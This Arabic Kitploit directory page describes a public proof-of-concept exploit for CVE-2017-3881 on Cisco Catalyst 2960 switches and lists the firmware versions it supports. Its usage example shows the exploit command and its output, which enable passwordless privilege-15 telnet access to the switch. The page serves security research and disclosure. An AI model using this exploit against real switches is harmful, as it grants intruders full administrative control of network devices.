Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cisco-rce — CVE-2017-3881 إثبات المفهوم (PoC) لتنفيذ التعليمات البرمجية عن بُعد في Cisco Catalyst | Kitploit
أدوات/GitHubGitHub/artkond/cisco-rce
أمان الأنظمة المدمجةأطر الاستغلالتحليل الثغرات الأمنيةالاستغلالأمن الشبكاتاختبار الاختراق
GitHubartkond/cisco-rce

cisco-rce

CVE-2017-3881 إثبات المفهوم (PoC) لتنفيذ التعليمات البرمجية عن بُعد في Cisco Catalyst

عرض المستودع
21379منذ 9 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2017-3881 تنفيذ التعليمات البرمجية عن بُعد في Cisco IOS

===================

يحتوي هذا المستودع على كود إثبات المفهوم (Proof-of-Concept) لاستغلال ثغرة تنفيذ التعليمات البرمجية عن بُعد التي كشفت عنها شركة Cisco Systems في 17 مارس 2017 - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp

الوصف

الشرح الكامل للاستغلال متاح هنا - https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/

كود استغلال RCE متاح لطراز محوّل Cisco Catalyst 2960. هذا الاستغلال يعتمد على النسخة البرمجية (firmware). النسختان البرمجيتان التاليتان مدعومتان:

  • 12.2(55)SE1 C2960-LANBASEK9-M

  • 12.2(55)SE11 C2960-LANBASEK9-M

كود رفض الخدمة (Denial of Service) متاح كوحدة روبي لـ Metasploit. من المفترض أن يعمل مع معظم المحوّلات المذكورة في نشرة Cisco الأمنية (يلزم التأكيد).

مثال الاستخدام

root@kitploit:~
$ python c2960-lanbasek9-m-12.2.55.se11 192.168.88.10 --set
[+] Connection OK
[+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f'
[+] Sending cluster option
[+] Setting credless privilege 15 authentication
[+] All done
$ telnet 192.168.88.10
Trying 192.168.88.10...
Connected to 192.168.88.10.
Escape character is '^]'.

catalyst1#show priv
Current privilege level is 15

المؤلف

Artem Kondratenko https://twitter.com/artkond

تنزيل الأداة